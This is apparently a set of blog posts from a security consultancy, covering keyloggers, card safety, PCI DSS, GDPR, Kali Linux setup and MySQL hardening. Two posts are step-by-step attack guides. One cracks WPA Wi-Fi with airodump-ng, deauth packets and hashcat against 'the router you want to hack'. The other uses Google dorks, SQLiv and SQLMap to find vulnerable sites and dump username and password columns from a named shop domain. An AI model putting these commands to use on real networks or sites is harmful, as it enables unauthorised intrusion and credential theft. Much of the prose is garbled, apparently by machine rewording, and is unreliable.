Airzero Sec

We Do Not Give Up ! Trust US !

enter image description here

What is a Keylogger?

Keyloggers operate in the context of cyber threats, they are not always illegal to download and use. Keyloggers are a major tool for corporations, which IT use to troubleshoot technical mistakes on their systems and networks—or to keep an eye on staff surreptitiously and who want to check other activities and to monitor them.

In these cases, if the company or person that is enabling the keylogger actually owns the device, then it’s correctly legal. And there are hundreds of commercially available keyloggers on the Internet.

However, the thinking about keyloggers is when suspicious cybercriminals are behind them. And they definitely do not own the device they attack. You don’t have any idea they’ve breached your computer, and depending on what type of keylogger it is, it can steal any passwords you’ve entered, periodically take screenshots, record the web pages you view, grab on to your sent emails and any instant messaging sessions, as well as sensitive financial information and then send all that data over the network to a remote computer. There, the individual operating the logging program can use it all, no doubt sending it to criminals for criminal purposes.

Keyloggers come in two wide flavors—hardware devices and the more common software variety. Hardware machines can be embedded in the internal PC hardware itself, But that means that the cybercriminal has to have physical touch to the PC while you’re not present in order to plant the hardware keyloggers.

Software keyloggers are much easier to introduce to and install on victims’ systems, which is why that variety is much more basic. Unlike other types of software, keyloggers are not a problem to the systems they infect themselves. In fact, the whole point of keyloggers is to work behind the cases, sniffing out the keystrokes while the computer continues to work normally. But even if they don’t destroy the hardware, keyloggers are of course a threat to users, especially when they steal data pertinent to any number of internet payment systems.

How can you tell if you have a keylogger infection?

Keyloggers invade personal computers in the same way that other cyber threats do. The download when you click on a file attachment that you’ve been duped into opening most basically because you fell for a social engineering scheme. That type of attachment can come to you by email, through a text message, an instant message, on social networks, or even through a visit to an otherwise legitimate but infected website. Also, keyloggers are very rare when they arrive solo. The same Trojan that transports the keylogger can slip other malware on your personal computer such as adware, spyware, etc.

How can you identify and remove keyloggers?

The well-designed basic grade of keylogger commonly works flawlessly, so it does not be a threat to the system’s performance at all. If the keylogger is transporting reports to a remote operator, it disguises itself as normal files. Some of the programs will even show a notice on the screen that the system is being observed such as in a corporate computing ecosystem. Others can reinstall themselves if users somehow succeed in identifying them and attempting to remove them.

Keyloggers of bad quality might reveal themselves in a number of ways. The software might subtly degrade smartphone screenshots to a viewable form. On all devices, there could be a slowdown in web searching performance. Or there’s a distinct slowness in your mouse movement, or what you are actually typing doesn’t show up on your display. You might even get an error message when loading graphics. All in all, something just needs to be stopped.

Of course, the best way to secure yourself and your personal computer from falling victim to keyloggers is to scan your system regularly with a quality cybersecurity program. For instance, Malwarebytes is fully secured to sniff out keyloggers. It uses signature recognition, and identification of perfect keylogger behavior associated with keystroke and screenshot capturing to first identify the malware, and then delete it. You can try malware bytes if you're worried you may have a malware mistake.

How can you protect yourself from Keyloggers?

Avoid keyloggers by avoiding the user problems that transform their ability to infect phones and computers. It starts with keeping your os, your applications, and web browsers up to date with the latest safety patches. Always be concerned about any attachments you receive, especially unwanted ones even if they seem to come from someone you know. When in doubt, contact the sender to enquire. Keep your passwords long and be more complex, and avoid using the same one for different machines.

Real-time, always-on anti-malware security is the gold standard for preventing not only infection from a keylogger, but also from all other associated cyber problems. For all platforms and devices, from personal computers and mobile phones to business environments, Malwarebytes is a first-line defense against the relentless onslaught of criminal attacks.

If you have any doubts about this topic or have to get the best cybersecurity services and get the best protection from cyber threats. Feel free to contact us. AIRZERO SEC will be your digital partner. Email id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

In this digital era, it is very important to secure our credit cards. In this blog, you got a clear idea of how to secure your Credit card.

What are the benefits of using a credit card?

  • It is safer than cash
  • It is your network that you have covered
  • It always keeps you protected

Safer than cash

When it comes to peace of mind, there’s no better way to pay than with your payment card. There’s a whole range of security tools and safety features made into your card. So whether you’re purchasing in a store, online or on your mobile device, you can do it all with courage.

Your network has you covered

When you use your credit card, you’re used by a payment network that’s designed to be safe and smart.

Keeping you protected

Compared to cash or cheque, payment cards are a secure way to pay. Their various-layer security safeguards you against unwanted transactions. Payment cards also leave a trail, unlike cash, which financial organizations can follow to copy and recover your money. But you also play a major part when it raises your safety, by checking your transactions, keeping your card secure and your PIN secret.

What are the Security tips to protect yourself?

  • First, Look for the Mastercard Identity Check logo
  • Second, Sign up for Transaction alerts
  • Third, Be familiar with your card issuer’s policies
  • Fourth, Beware of phishers
  • Fifth, Check your statements
  • Sixth, Keep your ATM PIN private

Look for the Mastercard Identity Check logo:

When you purchase at online merchants that support Mastercard Identity Check, you can enjoy real peace convincing your purchases are protected with an extra layer of safety, with or without a one-time password.

Sign up for Transaction alerts

Transaction notifications let you know whenever there’s a play in your accounts, so it’s a good idea to sign up all your cards for them.

Be familiar with your card issuer’s policies

Every bank has its own security in place for your peace of mind. Talk to your bank to find out what they are.

Beware of phishers

Phishers try to gain personal details from you, like your payment card number, PIN, username or password. Don’t react to them. Instead, call your bank to make a report.

Check your statements

Regularly monitor your bank and card statements. Call your bank if you point to any unwanted transactions.

Keep your ATM PIN private

Don’t share your ATM Pin with anyone. If you don't remember your PIN or think it may have been compromised, ask your bank for a new one.

If you have any doubts about this topic or have to get services and get the best cyber security services. Feel free to contact us. AIR ZERO CLOUD will be your digital partner. Email id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

The payment card industry data security standard is a set of needs to be intended to ensure that all organizations that process, store, or transmit credit card information maintain a secure surrounding. An independent body created by Visa, MasterCard, American Express, Discover, and JCB, administers and manages the PCI DSS. Interestingly, the payment brands and acquirers are responsible for strengthening compliance, rather than the PCI SSC.

An Overview Of PCI SSC Data Security Standards

In an effort to enhance payment card data security, the PCI Security Standards Council provides comprehensive standards and support things, which include frameworks, tools, measurements, and support resources to help companies ensure the security of cardholder information at all times. The PCI DSS is the cornerstone of the council, as it provides the necessary framework for developing a complete card data security process that encompasses prevention, detection, and is the appropriate action to security incidents.

What are the Tools Available from PCI SSC?

  • Self-Assessment Questionnaires to assist companies in validating their PCI DSS compliance.
  • PIN Transaction Security needs for device vendors and manufacturers and a list of consented PIN transaction devices.
  • Payment Application Data Security Standard and a list of Payment Applications to help software technologies and others develop safe payment applications.
  • Public resources: * Lists of Qualified Security Assessors. * Payment Application Qualified Security Assessors. * Approved Scanning Vendors * Internal Security Assessor education program

What Are The 12 Requirements For PCI DSS Compliance?

  • USE AND MAINTAIN FIREWALLS:
    Firewalls essentially remove access to foreign entities attempting to access personal data. These prevention systems are often the first line of defence against attackers. Firewalls are needed for PCI DSS compliance because of their effectiveness in preventing unwanted access.
  • PROPER PASSWORD PROTECTIONS: <br.Routers and other third-party things often come with generic passwords and safe measures simply accessed by the public. Too often, businesses fail to save these vulnerabilities. Ensuring compliance in these places includes keeping a list of all devices and software which require a password. In addition to a device inventory, common precautions and configurations should also be enacted.
  • PROTECT CARDHOLDER DATA:
    The third need of PCI DSS compliance is the two-fold firewall of cardholder data. Card Data must be encrypted with some important algorithms. These encryptions are put into place with an encryption key which is also needed to be encrypted for compliance. Regular check and scanning of primary account numbers are needed to ensure unencrypted data exists.
  • ENCRYPT TRANSMITTED DATA:
    Cardholder data is sent across a number of different ordinary channels. This data must be encrypted whenever it is sent to these known areas. Account numbers should also never be transferred to areas that are unknown.
  • USE AND MAINTAIN ANTI-VIRUS:
    Enabling anti-virus software is a great practice outside of PCI DSS compliance. However, anti-virus software is required for all machines that interact with and store PAN. This software should be regularly checked and updated. Your POS provider should also employ anti-virus measures where it cannot be directly enabled.
  • PROPERLY UPDATED SOFTWARE:
    Firewalls and anti-virus software will need to be updated often. It is also a good idea to update every piece of software in a business. Most software technologies will add security measures, such as patches to address recently identified vulnerabilities, in their updates, which add another level of security. These updates are especially required for all software on devices that communicate with store cardholder data.
  • RESTRICT DATA ACCESS:
    Cardholder data is required to be important “need to know.” All staff, executives, and third parties who do not need access to these details should not have it. The roles that do need sensitive data should be well-documented and updated regularly as required by PCI DSS.
  • UNIQUE IDS FOR ACCESS:
    Persons who do have access to cardholder data should have personal credentials and identification for access. For instance, there should not be a simple login to the encrypted data with multiple employees knowing the username and password. Unique IDs create less vulnerability and a faster response time in the event data is compromised.
  • RESTRICT PHYSICAL ACCESS:
    Any cardholder data must be physically kept in a safe area. Both data that is physically written and data that is digitally kept should be locked in a safe room, drawer, or cabinet. Not only should access be boarded, but anytime the private data is accessed, it should be kept in a log to remain compliant.
  • CREATE AND MAINTAIN ACCESS LOGS:
    All activities dealing with cardholder details and primary account numbers require a log entry. Perhaps the most common non-compliance issue is not efficient record-keeping and data when it comes to accessing private data. Compliance needs to document how details flow into your institution and the number of times access is required. Software products to log access are also required to ensure accuracy.
  • SCAN AND TEST FOR VULNERABILITIES:
    All ten of the previous compliance involve several software products, physical locations, and likely a few employees. There are many needs that can malfunction, go out of date, or suffer from manual error. These problems can be placed by fulfilling the PCI DSS needed for regular scans and vulnerability testing.
  • DOCUMENT POLICIES:
    Inventory of equipment and software that have access will need to be spotted for compliance. The logs of enabling cardholder data will also need documentation. How details flow into your company, where it is kept, and how it is used after the point of sale will also all need to be data.
  • BENEFITS OF PCI COMPLIANCE
    Complying with PCI Security Standards seems like a daunting plan, at the very least. The maze of standards and issues seems like a lot to handle for large companies, let alone little companies. Yet, compliance is becoming more important and may not be as troublesome as you assume, especially if you have the right options.
  • DIFFICULTIES POSED BY PCI NON-COMPLIANCE
    PCI SSC also points to potentially disastrous results of failing to meet PCI Compliance. After working to build your brand and secure customers, don’t take an option with their sensitive details. By meeting PCI Compliance, you are protecting your clients so they can continue to be yours. Possible results of PCI Non-Compliance include:
  • Compromised data that negatively impacts consumers, merchants, and financial institutions.
  • Severely damaging your reputation and your ability to conduct business effectively, not just today, but into the future.
  • Account data breaches can lead to catastrophic loss of sales, relationships, and community standing; plus, public companies often see depressed share prices as a result of account data breaches.
  • Lawsuits, insurance claims, cancelled accounts, payment card issuer fines, and government fines.
    PCI Compliance, as with other regulations needs, can pose challenges to organizations that are not prepared to deal with protecting crucial details. But, protecting data is a much more manageable task with the right software and services. Choose a data loss prevention software that accurately classifies data and uses it appropriately so you can rest more easily knowing that your cardholder data is safe.

If you have any doubts about the above topic or have to get services and consultations against every serious cyber problem. Feel free to contact us. AIRZERO SEC will be your strong cyber partner. E-mail id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

The General Data Protection Regulation is a legal framework that sets rules for the collection and processing of personal information from persons who live in the European Union. Since the Rules applies regardless of where websites have stayed, it must be heeded by all websites that attract European visitors, even if they don't specifically market goods to European Union residents.

The GDPR mandates that European Union visitors be given a number of data. The website must also take points to facilitate such European Union consumer rights as a timely notification in the event of private data being breached. That was in April 2016, the Regulation came into complete effect in May 2018, after a two-year transition period.

What are the Customer-Service Requirements of the GDPR?

Under the instructions, visitors must be told of data the site collects from them and explicitly consent to that details-gathering, by selecting on an Agree button or other action. Websites must also communicate with users in a timely way if any of their private data held by the site is breached. These European Union needs may be more stringent than those needed in the jurisdiction in which the website is placed.

Also mandated is an effort of the site's data security, and whether a dedicated data protection officer needs to be hired to carry out this function.

Information on how to contact the Data Protection Officer and other important staffers must be accessible so that visitors may exercise their European Union data rights, which also include the skill to have their presence on the site disappear, among other measures.

Does GDPR Apply to US Companies?

The GDPR applies to US businesses, regardless of their size in terms of revenue or staff, whether any of the below conditions are satisfying

  • The company offers goods to EU and EEA residents.
  • The company monitors the character of users inside the EU andEEA

Private data and behavior covered by the GDPR include names, contact details, device information, biometric information, photographs, and more.

GDPR compliance needs vary depending on the behavior of the company. For the moment, businesses with fewer than 250 employees do not need to maintain a record. However, this instruction applies only if the processing is not likely to pose a risk to the rights and freedoms of the data subjects if no special categories of data are processed.

Does GDPR Apply to US Citizens?

Depending on where they are situated, the GDPR can and also apply to US citizens.

The GDPR uses the term data subject to refer to the person whose data is being processed. Per most interfaces of the GDPR, whether the GDPR applies is dependent on where the data subject is when their data is processed, and not the citizenship of the data record.

Does GDPR Apply to the US Government?

The GDPR does not make blanket exceptions to governmental agencies. Therefore, if the US government targets or processes the private data of EU and EEA-based users, it will be expected to comply with the GDPR. This is true for all non-EU and EEA public agencies. The GDPR does afford a few non-border to member states of the EU and EEA.

One such exemption is that government agencies are excused from complying with certain conditions of the GDPR so long as private data is processed in public interest, such as for preventing and prosecuting criminal offenses or threats to public safety.

GDPR Requirements for US Companies

In the event that a US company is expected to fulfill the GDPR, it is wished to meet the same strict needs that companies situated in the EU are expected to meet.

The text of the GDPR is quite extensive, and ensuring compliance can be worrying. For organizations that must comply with the GDPR, the following are the key needs and features:

  1. Data Breach Notifications
  2. Data Protection Impact Assessments
  3. Privacy by Design
  4. Strict Consent Conditions
  5. Data Subject Access Requests
  6. Appointing a Data Protection Officer

GDPR Enforcement in the US

In Europe, power of the GDPR is located with the numerous supervisory authorities in the EEA and Switzerland. There are several mechanisms through which the GDPR can be powered in the US.

  1. If the company has a presence or assets in the EU and EEA, they can be seized for GDPR noncompliance.
  2. For companies without a physical presence in the EU and EEA, the GDPR mandates the appointment of a leadered who is physically located within the EU and EEA. In cases of GDPR noncompliance, this person would be a likely channel through which fines are levied.
  3. International law is another channel through which legal action can be taken. Given that it is mutually beneficial for national enforcement agencies to support each other, punitive actions may be pursued by the EU and EEA enforcement agencies. These agencies are likely to be assisted by public organizations in the country where the company is registered.

To sum up, especially for multinational companies, noncompliance will be pursued aggressively by the EU and EEA enforcement agencies.

GDPR Fines for US Companies

The national enforcement agencies of various EU and EEA countries have the legal means to enforce noncompliance fines and penalties on companies located outside of their territory.

Conclusion

Whether the GDPR applies is dependent on where the data subject is when their data is processed, and not the citizenship or nationality of the data subject. Any US company that serves customers in the EU and EEA — or tracks their character within this region — must fully comply with the GDPR.

If you have any questions about the above topic or have to get services and consultations against every serious cyber threat. Feel free to contact us. AIRZERO SEC will be your strong cyber partner. E-mail id: [email protected]

enter image description here Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

What is Aircrack-ng?

Aircrack-ng is a Wi-Fi safety auditing tool specifically 802.11 WEP. It is also used for cracking the WEP and WPA keys for getting access to a network. Aircrack-ng is used by learning persons and safety professionals to test the safety, reliability of wireless networks.

What are the steps to hack wifi?

  • The first step is to open your Kali Linux terminal
  • The second step is to enter the Aircrack-Ng command
  • The next step is to enter the password
  • The next important step is to install Aircrack-ng
  • Ok then, Turn on Airmon-ng
  • Next is to find the monitor name
  • The next step is to start monitoring the network
  • Next is to enable a monitor mode interface
  • Next to kill any processes that return errors
  • Next is to review the monitor interface name
  • Next is to tell your computer to listen to nearby routers
  • Next is to find the router that you want to hack
  • Make sure the router is using WPA security
  • Next is you have to note the MAC address and channel number of the routers
  • The next step is to monitor your selected networks for a handshake
  • The next step is you have to wait for a handshake to appear
  • Next is to exit airodump-ng, Then open the desktop
  • Next is to Rename your “.cap” file
  • Covert the “.cap” file into “.hccapx” format
  • Installnaive-hash cat
  • Run naive-hashcat
  • Next is to wait for the network password to be cracked

How to Open your Kali Linux computer's Terminal?

Find and click the Terminal app, which resembles a black box with a white symbol on it. You can also just click keypress+Alt+Ctrl+T to open the Terminal.

How to Enter the Aircrack-ng installation command?

Type in the below command, then press keypress+Enter sudo apt-get install aircrack-ng

How to Enter your password when prompted?

Type in the password you use to log into your computer, then press keypress+Enter. This includes root access for any other commands run in the Terminal. If you open another Terminal window, you may have to run a command with the prefix and/or enter your password again.

How to install Aircrack-ng?

Press keypress+Y when prompted, then wait for the program to finish installing.

How to Turn on Airmon-ng?

Type in the following command, then press keypress+Enter.

airmon-ng

How to Find the monitor name?

You'll find this in the user Interface column. If you're hacking the network that you own, it will usually be named "wlan0". If you don't see a name, your Wi-Fi card doesn't support it.

How to Begin monitoring the network?

.You can do so by typing in the below command and pressing keypress+Enter airmon-ng start wlan0

Make sure you change "wlan0" with the name of your aimed network if it is variant.

How to Enable a monitor mode interface?

Enter the following command iwconfig

How to Kill any processes that return errors?

In some situations, the Wi-Fi card will conflict with services on your computer. You can kill these processes by typing the following command airmon-ng check kill

How to Review the monitor interface name?

In majority situations, the name will be something like "mon0" or "wlan0mon".

How to Tell your computer to listen to nearby routers?

To get a list of routers, enter the following command: airodump-ng mon0

Make sure to change "mon0" with whatever your monitor interface name was in the last step.

How to identify the router you want to hack?

At the end of each string, you'll see a name, find the one belonging to the network you want to hack into. How to Make sure the router is using WPA or WPA2 security?

If you see "WPA" or "WPA2" immediately to the left of the network's name, you can proceed, otherwise, you cannot hack the network.

How to Note the MAC address and channel number of the router?

This collection of information is to the left of the network's name ''MAC address'' — This is the line of numbers on the far-left side of your router's line. ''Channel'' — This is the number directly to the left of the WPA or WPA2 tag.

How to Monitor your selected network for a handshake?

A handshake was happening when an item connects to a network. Enter the below code, making sure to replace the suggested components of the command with your network's information airodump-ng -c channel --bssid MAC -w /root/Desktop/ mon0

Replace "channel" with the number that you found in the last step. Replace "MAC" with the address you found in the last step. Remember to replace "mon0" with whatever your interface name was. Here's an example address: airodump-ng -c 3 --bssid 1C:1C:1E:C1:AB:C1 -w /root/Desktop/ wlan0mon

How to Wait for a handshake to appear?

Once you see a line with the tag "WPA handshake:" followed by a MAC address in the upper-right corner of the screen, you can proceed. If you're not in a waiting mood, you can, before continuing with this part.

How to Exit airodump-ng, then open the desktop?

Press keypress+Ctrl+C to quit, then make sure you can see the ".cap" file on your computer's desktop.

How to Rename your '''".cap" file.''?

While not strictly necessary, this will make it easier to work with later. Enter the below command to change the name, making sure to replace "name" with whatever you want to name the file: mv ./-01.cap name.cap

If your ".cap" file isn't named "-01.cap", replace "-01.cap" with whatever your ".cap" file's name is.

How to Convert the '''".cap" file into ".hccapx" format.'''?

You can do this by using a converter. Enter the below command, making sure to replace "name" with the file's name: cap2hccapx.bin name. cap name.hccapx

upload the ".cap" file to the converter by clicking '''Choose File''' and selecting your file. Once the file is uploaded, click '''Convert''' and then download it back onto your desktop before proceeding.

How to Install naive-hashcat?

This is the way you'll use to crack the password. Enter the following commands in order: sudo git clone https://github.com/brannondorsey/naive-hashcat cd naive-hashcat curl -L -o dicts/rockyou.txt
https://github.com/brannondorsey/naive-hashcat/releases/download/data/rockyou.txt

If your computer doesn't have a GPU, you'll need to use Aircrack-ng instead.

How to Run naive-hashcat?

Once it finishes, enter the below command: HASH_FILE=name.hccapx POT_FILE=name.pot HASH_TYPE=2500 ./naive-hashcat.sh

How to Wait for the network password to be cracked?

Once the password is hacked, its string will be added to the "name. pot" file found in the "naive-hashcat", the word after the last colon in the string is the password. It can take anywhere from a bit hours to a few months for the password to be hacked.

How do we use Aircrack-Ng for Non-GPU computers?

  • First, you have to download a directory file
  • Second has to tell aircrack-ng to begin cracking the password.
  • Last Step you have to wait for the terminal to display the result.

How to Download a dictionary file?

The most used dictionary file is "Rock You". You can download it by typing the below command: curl -L -o rockyou.txt Remember that aircrack-ng will not be able to crack the WPA or WPA2 password if the password isn't in the word list.

How to Tell Aircrack-ng to begin cracking the password?

Enter the following command, making sure to use the necessary network information when doing so: `aircrack-ng -a2 -b MAC -w rockyou.txt name.cap If you're cracking a WPA network instead of a WPA2 network, replace "-a2".

Replace "MAC" with the address you identify in the last section. Replace "name" with your ".cap" file's name.

How to Wait for Terminal to display the results?

When you see a "KEY FOUND!" appears, Aircrack-ng has found the password. You'll see the password in brackets to the right of the "KEY FOUND!".

How do we use a deauth attack to force a handshake?

  • The first is to understand what a deauth attack does
  • The second step is to monitor your network
  • Next is to wait for something to connect to the network
  • Open a new terminal window
  • Next is to send the deauth packets
  • Last is to Re-open the original terminal window

How to Understand what a deauth attack does?

Deauth attacks send malicious de-authentication packets to the router you're trying to break into, causing the Internet to disconnect and ask the Internet user to log back in. Once the user logs back in, you will be provided with a handshake.

How to Monitor your network?

Enter the below command, making sure to enter your network's information where it suggested’ airodump-ng -c channel --bssid MAC

For example: airodump-ng -c 1 --bssid 9C:5C:8E:C9:AB:C0

How do we Wait for something to connect to the network?

Once you see two MAC addresses appear next to each other, you can proceed. This indicates that a client is now connected to the network.

How to Open a new Terminal window?

You can just press keypress+Alt+Ctrl+T to do this. Make sure airodump-ng is still running in the background.

How do Send the deauth packets?

Enter the below command, making sure to change your network's information: aireplay-ng -0 2 -a MAC1 -c MAC2 mon0

The number refers to the number of packets to send. You can change this number, but keep in mind that sending more than two packets can cause a noticeable security breach. Replace "MAC1" with the address at the bottom of the background Terminal window. Replace "MAC2" with the address at the bottom of the background Terminal window. Remember to change "mon0" with your name that you found when your computer initially looked for routers. An example command looks like this:

aireplay-ng -0 3 -a 9C:5C:8E:C9:AB:C0 -c 64:BC:0C:48:97:F7 mon0

How to Re-open the original Terminal window?

Go back to the Terminal window when you're done sending the packets.

Look for a handshake. Once you see the "WPA handshake: "the address next to it.

If you have any queries about the above topic or have to get services and consultations against every serious cyber threat. Feel free to contact us. AIR ZERO SEC will be your strong cyber partner. E-mail id: [email protected].

enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

The individuals that use databases for various data storage management greatly increase in web app development as time moves on. The database facilitates communication between users and servers. The database gives different benefits including data input and where it is kept, retrieval of large information and the ease of grouping information.

This is both exciting and worrying because in a database there are a lot of important details like credential accounts, financial details and so on. Also, to do SQL injection attacks does not always need an expert injecting capability, in the sense, even kids can do it. Because there are many applications that are useful to perform SQL injection automatically, such as SQLMap. SQLMap is an application for penetration testing activities that aims to conduct SQL injection attacks in database security automatically. Here in this blog, we will show you how to do SQL injection using SQLMap. No special requirements are needed but will be worth more if you master a scripting language. This blog is suggested for those who are new to SQL injection, or who want to see how SQL injection works.

What Is SQL Injection?

SQL injection is specially referred to as SQLi, maybe it’s a most common attack method that uses inappropriate code for back-end database changes to access details that weren't intended to be displayed and are highly mentioned to be highly secret.

How does SQL injection work?

To run a SQL injection, an attacker must locate a weak input in a web application or webpage. When an application or web page includes an SQL injection vulnerability, it uses user input in the form of an SQL query. The attacker can execute a specifically build SQL command as a malicious cyber threat. Then, leveraging this code the attacker can acquire a response that provides a clear direction about the database construction and thereby access to all the information in the database.

How do we do SQL injection using SQLmap in Kali Linux?

  • The first step is to install sqliv on Kali Linux
  • The next step is finding SQL injection vulnerabilities
  • The last and final step is SQL injection using SQL map

How to install sqlive on Kali Linux?

Type following command into your terminal to install SQLiv:

~# git clone https://github.com/Hadesy2k/sqliv.git
~# cd sqliv && sudo python2 setup.py -i

After SQLiv is installed in your Kali Linux, it is kept in the path /usr/bin/sqliv. Which, you can call from the terminal, by typing ‘sqliv’.

How do we find SQL injection vulnerabilities?

We will always use Google Dorking to scan and identify the SQL injection in targets. Let’s take a simple dork, and let SQLiv scan through each target and look for an eCommerce vulnerability at the following URL pattern ‘item.php?id=’. To find other patterns just google for “google dork list”.

~# sqliv -d inurl:item.php?id= -e google -p 100

By default, SQLiv will crawl the f page on a search, which on google sites per page. Thus, here we define argument -p 100 to crawl through 100 sites.

How do we do SQL injection using SQLmap?

Once we got at least one SQL injection vulnerable point, next we run the attack using SQLMap. Firstly, we are required to reveal the database name, the database has tables and columns, Those that contain the data. Steps to follow:

  • The first step is to enumerate the database names
  • The next step is to enumerate the table’s name
  • The third step is to enumerate columns
  • Last step is to dump data

How to enumerate the database names:

Command pattern:

~# sqlmap -u “TARGET URL” --dbs
-u / --url : Target URL
--dbs : Enumerate Database/s name

So, for example, the command would look like this:

`~# sqlmap -u “http://www.acfurniture.com/item.php?id=25” --dbs`

How to enumerate tables name:

Command pattern:

~# sqlmap -u “TARGET URL” -D database-name --tables

So, For example, the command compiled be like this:

~# sqlmap -u " the link that you try to inject" -D acfurniture --tables

How to enumerate column names:

Command pattern:

~# sqlmap -u “TARGET URL” -D database-name -T table-name --columns

So, for example, the command compiled be like this:

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings--columns

How do we dump data?

Command pattern:

~# sqlmap -u “TARGET URL” -D database-name -T table-name -C columns --dump

So, for example, the command compiled be like this:

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings -C username,password --dump

Or you can also delete all data inside the table, By using the command that gives us an example instead of the given url you should choose the url that you want to do SQL injection:

~# sqlmap -u "http://www.acfurniture.com/item.php?id=25" -D acfurniture -T settings --dump

If you have any queries about the above topic or have to get services and consultations against this serious cyber threat. Feel free to contact us. AIRZERO SEC will be your strong cyber partner.

E-mail id: [email protected]

enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

How To Install Kali Linux?

- Posted in Ethical Hacking by

enter image description here

A suitable operating system helps you in performing time-consuming and tedious tasks efficiently. Currently, There is a numberless Linux-based Operating system but installing kali-Linux is arguably one of the best options. It is used by cybersecurity professionals for penetration testing, ethical hacking, and network security assessments. In this blog, we will take a look at how to install Kali Linux.

What is Kali Linux?

Kali Linux is the leading Linux distribution in penetration testing, ethical hacking, and security auditing.

When it will be penetration testing, hacking and Linux distributions, one of the best things to be mentioned is Kali Linux. The software comes firstly packaged with a variety of different command-line hacking tools geared towards various detailed safety tasks. Such as Penetration Testing, Computer Forensics, and application security. commonly, Kali Linux is the best operating system for ethical hackers and is broadly recognized in all parts of the world.

What is Kali Linux used for?

Kali Linux is mainly used for Penetration Testing and mainly in Security Auditing. Kali contains various tools that are geared to the various information security tasks, such as Penetration Testing, Computer Forensics and Reverse Engineering.

How to install Kali Linux?

Kali Linux installation is a super easy process and you have multiple installation options. The most preferred ones include:

  1. Installing Kali Linux by building a Kali bootable USB drive
  2. Hard disk installs in Kali Linux
  3. Using virtualization software
  4. Both booting Kali Linux with the operating system

While you have different options to choose from, in this blog, we will look at how to install Kali Linux using virtualization. Below are the stated steps, you can create your machine with all the options you need to perform a comprehensive penetration test.

What Are The Installation Requirements?

  • Minimum 20 GB of space in your hard drive
  • At least 4 GB of ram is recommended when using VMware
  • CD-DVD Drive or USB support

Getting run with Installation.

Need To Install Vmware:

In order to run Kali Linux on your system, we will need some piece of virtualization software first. There are many options to select from, such as Oracle’s VirtualBox. Once the installation is completed, release VMware from your applications folder.

Needed to install Kali Linux and check its image integrity

To access Kali Linux you can go through its official page and click the one that best suits your needs from there. It is included on the download page, you will identify a bunch of numbers. Kali Linux is intended to be used for safety-related tasks. So, you need to check the identity of the image you download.

Needed to launch a new virtual machine

On the VMware Workshop homepage, click on create a virtual machine, choose the Kali Linux iso file, select the guest operating system and configure virtual machine details. Start the virtual machine by selecting the Kali Linux VM, and then clicking on the Power On button.

What is the installation procedure?

  • Step 1:
    Once the system is powered up, you will be prompted to pick your preferred installation mode in the GRUB menu. Click graphical install and continue.
  • Step 2:
    The next couple of screens will ask you to select locale details such as your constant language, your area location and keyboard layout.
  • Step 3:
    Once through the local details, the loader will default by installing some additional things and configuring your network-related settings. Then the individual will prompt for a hostname and domain for this installation. Provide unused information for the environment and continue installing.
  • Step 4:
    Set a password for your Kali Linux and click continue. DOn’t EVER FORGET THIS PASSWORD.
  • Step 5:
    After the password is confirmed, the installer will encourage you to set the time zone and then stop at the disk partitioning. It will provide you with four choices about the partitions of the disk. The simplest option for you is to use ‘Guided – Use Entire Disk’. old users can use the “Manual” partitioning option for more granular options.
  • Step 6:
    Select the partitioning disk & then click on continue.
  • Step 7:
    Make sure that all changes are to be made to the disk on the host system. Be super aware that if you continue it will erase data on the disk.
  • Step 8:
    Once sufficient files are installed, the system will ask you if you want to set up a network mirror to obtain future pieces of software and updates. Make sure to enable these work tools if you wish to use Kali packages.
  • Step 9:
    Next, you will be enquired to install the GRUB boot. Select ‘Yes’ and click the machine to write the needed boot loader details to the hard drive which is needed to boot Kali.
  • Step 10:
    Once the installer completes installing GRUB to the disk, click on continue to complete the installation, it will install some final stage files.

If you have any queries about this topic or have to get services and digital forensic and penetration testing services. Feel free to contact us. AIRZERO SEC will be your strong firewall. E-mail id: [email protected]

enter image description here

Author - Johnson Augustine
Ethical Hacker and Data Security Researcher
Founder: Airo Global Software Inc
LinkedIn Profile: www.linkedin.com/in/johnsontaugustine/

enter image description here

The most valuable and prominent asset for technology-based companies is usually the user or product information in the database. And so, a critical part of database administration in such companies consists of securing or making these databases safe against outside attacks and hardware or software failures.

How to Improve MySQL Database Security?

In the majority of cases, hardware and software failures are handled through a data backup immediately. Most databases come with types of equipment to automate the whole process, making this aspect of the work relatively painless and error-free. That is not so simple, however, in the second half of the game, making sure that external attackers can't get into the system and either steal or destroy the information contained there. And unfortunately, there usually isn't a correct way to solve this problem. rather, it requires you, the administrator, to manually put in place roadblocks and obstacles to trip up would-be hackers and to ensure that your company's information stays secure.

A common reason for not securing databases is that it is "most difficult" and "more complicated". While this is certainly true, if you're using MySQL, there are some easy things you can do to significantly reduce the risk of security.

Best Ways to Improve MySQL Database Security:

  1. Drop the test database
  2. Remove all unknown accounts
  3. Change the default port mapping
  4. Altar the hosts have access to MySQL
  5. Do nor run MySQL with root level privileges

Here we Explain MySQL Database Security Best Practices:

  • Drop the Test Database:
    The test database installed by the MySQL Server package as part of the mysql_install_db process can be fully accessed by all users by automatic, making it a common target for hackers. It should therefore be deleted during post-installation hardening.
  • Remove All unknown Accounts:
    MySQL by default builds several unknown users that essentially serve no need after installation. These accounts should therefore be deleted, as their presence on the system gives hackers an entry point in the database.
  • Change Default Port Mappings:
    MySQL runs on port 3306. This should be changed after installation to obfuscate what services are running on which ports, as hackers will initially attempt to exploit default values.
  • Alter Which Hosts Have Access to MySQL:
